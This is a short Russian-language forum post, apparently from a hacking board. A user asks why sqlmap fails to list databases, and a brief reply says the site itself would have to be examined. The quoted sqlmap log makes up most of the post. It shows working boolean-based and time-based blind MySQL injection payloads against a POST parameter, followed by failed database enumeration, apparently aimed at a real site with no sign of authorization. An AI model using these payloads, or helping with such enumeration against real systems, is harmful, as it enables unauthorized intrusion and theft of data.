23.05.2015, 07:27
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от kacergei
↑
Не подскажите в чем может быть проблема? Никак не выводит список баз
Код:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: city_jobs (POST)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace
Payload: company=35135&city_jobs=(SELECT (CASE WHEN (8743=8743) THEN 8743 ELSE 8743*(SELECT 8743 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: company=35135&city_jobs=1 AND (SELECT * FROM (SELECT(SLEEP(5)))iqmj)
---
[04:08:59] [INFO] testing MySQL
[04:08:59] [INFO] confirming MySQL
[04:08:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL >= 5.0.0
[04:08:59] [INFO] fetching database names
[04:08:59] [INFO] fetching number of databases
[04:09:04] [INFO] retrieved:
[04:09:04] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[04:09:04] [WARNING] time-based comparison requires larger statistical model, please wait.........................
[04:09:26] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[04:09:28] [INFO] retrieved:
[04:09:28] [ERROR] unable to retrieve the number of databases
[04:09:28] [INFO] falling back to current database
[04:09:28] [INFO] fetching current database
[04:09:28] [INFO] retrieving the length of query output
[04:09:32] [INFO] retrieved:
[04:09:37] [INFO] retrieved:
[04:09:42] [INFO] retrieved:
[04:09:42] [CRITICAL] unable to retrieve the database names
так никто вам не ответит, нужно смотреть сайт
|
|
|